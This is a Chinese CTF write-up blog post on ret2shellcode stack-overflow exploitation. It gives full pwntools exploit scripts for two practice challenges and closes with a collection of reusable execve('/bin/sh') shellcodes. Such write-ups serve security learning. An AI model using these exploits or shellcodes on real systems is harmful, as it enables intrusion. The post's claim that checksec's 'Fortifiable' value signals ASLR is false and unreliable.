

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/favicon.ico">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="例题1：BUUCTF ciscn_2019_n_5**题目分析 查看题目信息，64位，没有开启任何保护。 拖到ida里，只有一个关键函数main函数： 123456789101112int __cdecl main(int argc, const char **argv, const char **envp)&amp;#123;  char text[30]; &#x2F;&#x2F; [rsp+0h] [rbp-20h]">
<meta property="og:type" content="article">
<meta property="og:title" content="Pwn——ret2shellcode">
<meta property="og:url" content="http://example.com/2023/09/14/Pwn%E2%80%94%E2%80%94ret2shellcode-BUUCTF-ciscn-2019-n-5-1/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="例题1：BUUCTF ciscn_2019_n_5**题目分析 查看题目信息，64位，没有开启任何保护。 拖到ida里，只有一个关键函数main函数： 123456789101112int __cdecl main(int argc, const char **argv, const char **envp)&amp;#123;  char text[30]; &#x2F;&#x2F; [rsp+0h] [rbp-20h]">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/images/check.png">
<meta property="og:image" content="http://example.com/images/nc.png">
<meta property="og:image" content="http://example.com/images/name.png">
<meta property="og:image" content="http://example.com/images/text.png">
<meta property="og:image" content="http://example.com/images/pwn8-1.png">
<meta property="og:image" content="http://example.com/images/pwn8-2.png">
<meta property="og:image" content="http://example.com/images/pwn8-3.png">
<meta property="article:published_time" content="2023-09-14T07:44:33.000Z">
<meta property="article:modified_time" content="2023-09-21T05:51:33.488Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/images/check.png">
  
  
  
  <title>Pwn——ret2shellcode - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Welcome Π&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Pwn——ret2shellcode"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-09-14 15:44" pubdate>
          2023年9月14日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          29 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Pwn——ret2shellcode</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="例题1：BUUCTF-ciscn-2019-n-5"><a href="#例题1：BUUCTF-ciscn-2019-n-5" class="headerlink" title="例题1：BUUCTF ciscn_2019_n_5**"></a>例题1：BUUCTF ciscn_2019_n_5**</h2><h3 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h3><p><img src="/images/check.png" srcset="/img/loading.gif" lazyload></p>
<p>查看题目信息，64位，没有开启任何保护。</p>
<p>拖到ida里，只有一个关键函数main函数：</p>
<figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs arduino"><span class="hljs-function"><span class="hljs-type">int</span> __cdecl <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span></span><br><span class="hljs-function"></span>&#123;<br>  <span class="hljs-type">char</span> text[<span class="hljs-number">30</span>]; <span class="hljs-comment">// [rsp+0h] [rbp-20h] BYREF</span><br><br>  <span class="hljs-built_in">setvbuf</span>(stdout, <span class="hljs-number">0LL</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0LL</span>);<br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;tell me your name&quot;</span>);<br>  <span class="hljs-built_in">read</span>(<span class="hljs-number">0</span>, name, <span class="hljs-number">0x64</span>uLL);<br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;wow~ nice name!&quot;</span>);<br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;What do you want to say to me?&quot;</span>);<br>  <span class="hljs-built_in">gets</span>(text);<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>并且没有发现system和&#x2F;bin&#x2F;sh。</p>
<p>nc查看一下程序，有两个输入点，第一次让我们输入名字，限制输入长度为0x64，看一下name参数，发现name在全局变量bss段上</p>
<p><img src="/images/nc.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/images/name.png" srcset="/img/loading.gif" lazyload></p>
<p>第二次输入利用gets，没有限制长度，可以对v4造成溢出。</p>
<p><img src="/images/text.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p><strong>1.利用第一个输入点，往name参数里写入shellcode</strong></p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">context</span><span class="hljs-params">(arch=<span class="hljs-string">&#x27;amd64&#x27;</span>,os=<span class="hljs-string">&#x27;linux&#x27;</span>)</span></span>                   #用来导入pwntools模块<br>shellcode=<span class="hljs-built_in">asm</span>(shellcraft<span class="hljs-selector-class">.sh</span>())                     #利用pwntools模块自动生成shellcode<br>r<span class="hljs-selector-class">.sendlineafter</span>(<span class="hljs-string">&#x27;tell me your name&#x27;</span>,shellcode)     #往name中写入shellcode<br></code></pre></td></tr></table></figure>

<p><strong>2.v4溢出到name参数地址，去执行shellcode拿到shell</strong></p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs applescript">payload=&#x27;a&#x27;*<span class="hljs-number">0x28</span>+p64(<span class="hljs-number">0x601080</span>)                    <span class="hljs-comment">#让v4溢出到name参数地址</span><br>r.sendlineafter(&#x27;What do you want <span class="hljs-keyword">to</span> <span class="hljs-built_in">say</span> <span class="hljs-keyword">to</span> <span class="hljs-keyword">me</span>?&#x27;,payload)<br></code></pre></td></tr></table></figure>

<h3 id="完整exp"><a href="#完整exp" class="headerlink" title="完整exp"></a>完整exp</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import*<br><br><span class="hljs-attribute">r</span>=remote(&#x27;node4.buuoj.cn&#x27;,27058)<br><br>context(<span class="hljs-attribute">arch</span>=<span class="hljs-string">&#x27;amd64&#x27;</span>,os=&#x27;linux&#x27;)<br><span class="hljs-attribute">shellcode</span>=asm(shellcraft.sh())<br>r.sendlineafter(<span class="hljs-string">&#x27;tell me your name&#x27;</span>,shellcode)<br><br><span class="hljs-attribute">payload</span>=b&#x27;a&#x27;*0x28+p64(0x601080)<br>r.sendlineafter(<span class="hljs-string">&#x27;What do you want to say to me?&#x27;</span>,payload)<br>r.interactive()<br></code></pre></td></tr></table></figure>

<h2 id="例题2：https-oj-blue-whale-me-challenges-shellcode"><a href="#例题2：https-oj-blue-whale-me-challenges-shellcode" class="headerlink" title="例题2：https://oj.blue-whale.me/challenges#shellcode"></a>例题2：<a target="_blank" rel="noopener" href="https://oj.blue-whale.me/challenges#shellcode">https://oj.blue-whale.me/challenges#shellcode</a></h2><h3 id="题目分析-1"><a href="#题目分析-1" class="headerlink" title="题目分析"></a>题目分析</h3><p>checksec查看一下，</p>
<p><img src="/images/pwn8-1.png" srcset="/img/loading.gif" lazyload></p>
<p>这里的Fortifiable之前没有注意过，但这里他的值为2说明开启了ASLR（是一种针对于缓冲区溢出的安全保护技术。），但就因为开启了这个技术，使得这个题目不能用常规方法做。需要一点点改动。</p>
<p>先看看反汇编代码：</p>
<p>程序很简单，main函数中就调用了下面这个函数：</p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs scss">int <span class="hljs-built_in">sub_804851A</span>()<br>&#123;<br>  char buf<span class="hljs-selector-attr">[28]</span>; <span class="hljs-comment">// [esp+Ch] [ebp-1Ch] BYREF</span><br><br>  <span class="hljs-built_in">sub_80484EB</span>();<br>  <span class="hljs-built_in">puts</span>(&quot;input your name&quot;);<br>  <span class="hljs-built_in">read</span>(<span class="hljs-number">0</span>, buf, <span class="hljs-number">0</span>x100u);<br>  <span class="hljs-built_in">printf</span>(&quot;hello &quot;);<br>  return <span class="hljs-built_in">printf</span>(buf);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>buf存在溢出，又因为本题题目就为shellcode，那很容易想到将shellcode发送过去就行。</p>
<figure class="highlight wren"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs wren"><span class="hljs-variable">shellcode</span> <span class="hljs-operator">=</span> <span class="hljs-variable">b</span><span class="hljs-string">&quot;<span class="hljs-char escape_">\x31</span>\xc0<span class="hljs-char escape_">\x50</span><span class="hljs-char escape_">\x68</span>\x6e\x2f<span class="hljs-char escape_">\x73</span><span class="hljs-char escape_">\x68</span><span class="hljs-char escape_">\x68</span>\x2f\x2f<span class="hljs-char escape_">\x62</span><span class="hljs-char escape_">\x69</span><span class="hljs-char escape_">\x89</span>\xe3<span class="hljs-char escape_">\x50</span><span class="hljs-char escape_">\x89</span>\xe2<span class="hljs-char escape_">\x53</span><span class="hljs-char escape_">\x89</span>\xe1\xb0\x0b\xcd<span class="hljs-char escape_">\x80</span>&quot;</span><br><span class="hljs-variable">payload</span><span class="hljs-operator">=</span><span class="hljs-variable">b</span>&#x27;<span class="hljs-variable">A</span>&#x27;<span class="hljs-operator">*</span>(<span class="hljs-number">0x1c</span><span class="hljs-operator">+</span><span class="hljs-number">4</span>)<span class="hljs-operator">+</span><span class="hljs-variable">shellcode</span><br></code></pre></td></tr></table></figure>

<p>但这样打不通，原因就是开启了ASLR，需要利用 jmp esp 使控制流转向栈上的 shellcode。</p>
<p><strong>jmp esp的原理</strong><br>见下图，在当前栈空间内进行堆栈清理返回到前一个栈空间时，会将esp指向old esp。<br>如果我们利用栈溢出，将返回地址覆盖为指令jmp esp的地址，那么在返回到jmp esp指令时，程序在下一步就会跳转到我们的old esp继续执行，那么我们的payload应该是这样布局的：</p>
<figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm">payload = a*<span class="hljs-number">32</span> + p32(<span class="hljs-keyword">address </span>of <span class="hljs-keyword">jmp </span>esp) + 一系列<span class="hljs-keyword">NOP指令 </span>+ <span class="hljs-keyword">shellcode</span><br></code></pre></td></tr></table></figure>

<p>那么在跳转到old esp时，经过一系列NOP，程序最终执行shellcode.</p>
<p><img src="/images/pwn8-2.png" srcset="/img/loading.gif" lazyload></p>
<p>jmp esp的地址可以通过ROPgadget查找<br><img src="/images/pwn8-3.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="完整exp-1"><a href="#完整exp-1" class="headerlink" title="完整exp"></a>完整exp</h3><figure class="highlight wren"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs wren"><span class="hljs-variable">from</span> <span class="hljs-variable">pwn</span> <span class="hljs-keyword">import</span> <span class="hljs-operator">*</span><br><span class="hljs-comment">#from LibcSearcher import *</span><br><br><span class="hljs-variable">p</span><span class="hljs-operator">=</span><span class="hljs-title function_">remote</span>(<span class="hljs-string">&quot;vps1.blue-whale.me&quot;</span>,<span class="hljs-number">9992</span>)<br><span class="hljs-comment">#elf=ELF(&quot;./pwn&quot;)</span><br><br><span class="hljs-variable">shellcode</span> <span class="hljs-operator">=</span> <span class="hljs-variable">b</span><span class="hljs-string">&quot;<span class="hljs-char escape_">\x31</span>\xc0<span class="hljs-char escape_">\x50</span><span class="hljs-char escape_">\x68</span>\x6e\x2f<span class="hljs-char escape_">\x73</span><span class="hljs-char escape_">\x68</span><span class="hljs-char escape_">\x68</span>\x2f\x2f<span class="hljs-char escape_">\x62</span><span class="hljs-char escape_">\x69</span><span class="hljs-char escape_">\x89</span>\xe3<span class="hljs-char escape_">\x50</span><span class="hljs-char escape_">\x89</span>\xe2<span class="hljs-char escape_">\x53</span><span class="hljs-char escape_">\x89</span>\xe1\xb0\x0b\xcd<span class="hljs-char escape_">\x80</span>&quot;</span><br><span class="hljs-variable">jmpesp</span><span class="hljs-operator">=</span><span class="hljs-number">0x08048667</span><br><span class="hljs-variable">payload</span><span class="hljs-operator">=</span><span class="hljs-variable">b</span>&#x27;<span class="hljs-variable">A</span>&#x27;<span class="hljs-operator">*</span>(<span class="hljs-number">0x1c</span><span class="hljs-operator">+</span><span class="hljs-number">4</span>)<span class="hljs-operator">+</span><span class="hljs-title function_">p32</span>(<span class="hljs-variable">jmpesp</span>)<span class="hljs-operator">+</span><span class="hljs-variable">shellcode</span><br><span class="hljs-variable">p</span>.<span class="hljs-property">sendlineafter</span>(<span class="hljs-string">&quot;input your name&quot;</span>,<span class="hljs-variable">payload</span>)<br><span class="hljs-variable">p</span>.<span class="hljs-property">interactive</span>()<br></code></pre></td></tr></table></figure>

<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>整理了一些shellcode:</p>
<figure class="highlight moonscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs moonscript"># <span class="hljs-number">32</span>位 短字节shellcode <span class="hljs-comment">--&gt; 21字节</span><br>\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80<br><br># <span class="hljs-number">32</span>位 纯ascii字符shellcode<br>PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA<br><br># <span class="hljs-number">32</span>位 scanf可读取的shellcode<br>\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh<br><br># <span class="hljs-number">64</span>位 scanf可读取的shellcode <span class="hljs-number">22</span>字节<br>\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05<br><br># <span class="hljs-number">64</span>位 较短的shellcode  <span class="hljs-number">23</span>字节<br>\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05<br><br># <span class="hljs-number">64</span>位 纯ascii字符shellcode<br>Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t<br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Pwn——ret2shellcode</div>
      <div>http://example.com/2023/09/14/Pwn——ret2shellcode-BUUCTF-ciscn-2019-n-5-1/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年9月14日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/09/18/Pwn%E2%80%94%E2%80%94%E8%BE%93%E5%87%BAflag-txt/" title="Pwn——输出flag.txt">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Pwn——输出flag.txt</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/09/14/CSAPP%E2%80%94%E2%80%94%E4%BA%8C%E8%BF%9B%E5%88%B6%E7%82%B8%E5%BC%B9%E2%80%94%E2%80%94%E6%B1%87%E7%BC%96%E6%8C%87%E4%BB%A4%E7%A7%AF%E7%B4%AF/" title="CSAPP——二进制炸弹——汇编指令积累">
                        <span class="hidden-mobile">CSAPP——二进制炸弹——汇编指令积累</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>XpaiX</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
